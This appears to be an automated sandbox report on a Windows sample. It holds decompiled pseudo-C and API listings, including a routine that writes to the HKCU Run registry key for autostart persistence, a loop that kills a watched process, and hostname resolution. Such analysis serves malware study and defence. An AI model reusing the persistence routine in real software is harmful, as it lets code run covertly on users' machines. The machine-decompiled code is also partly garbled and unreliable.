    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
